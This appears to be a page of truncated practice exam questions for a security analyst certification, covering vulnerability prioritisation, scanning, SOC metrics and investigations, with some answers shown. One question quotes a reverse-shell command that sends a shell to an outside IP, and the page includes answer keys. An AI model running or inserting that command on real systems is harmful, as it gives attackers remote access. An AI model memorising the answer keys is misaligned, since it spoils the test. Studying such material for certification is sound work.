Which of the following factors would an analyst most likely communicate as the reason for this escalation?
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?A . Scope B. Weaponization C. CVSS...
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
The Company shall prioritize patching of publicly available systems and services over patching of internally available system. According to the security policy, which of the following vulnerabilities should be the highest priority to patch? A) B) C) D) A . Option A B. Option B C. Option C D. Option...
Which of the following would best meet this requirement?
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?A . External B. Agent-based C. Non-credentialed D. CredentialedView AnswerAnswer: B Explanation: Agent-based vulnerability scanning is a method that involves...
Which of the following would best protect this organization?
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?A . A mean time to remediate of 30 days B. A mean time to...
Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the...
Which of the following most likely describes the observed activity?
A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?A . There is an issue with the SSL certificate causinq port...
Which of the following is being attempted?
A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?A . RCE B. Reverse shell C. XSS D. SQL injectionView AnswerAnswer: B Explanation: A reverse shell is a type of shell access that allows a remote user...
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?A . Mean time to detect B. Number of exploits by tactic C. Alert volume D. Quantity of intrusion attemptsView AnswerAnswer: A Explanation: Mean time to detect...
Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?A . Conduct regular red team exercises over the application in production B. Ensure that all implemented coding libraries are...
When starting an investigation, which of the following must be done first?
When starting an investigation, which of the following must be done first?A . Notify law enforcement B. Secure the scene C. Seize all related evidence D. Interview the witnessesView AnswerAnswer: B Explanation: The first thing that must be done when starting an investigation is to secure the scene. Securing the...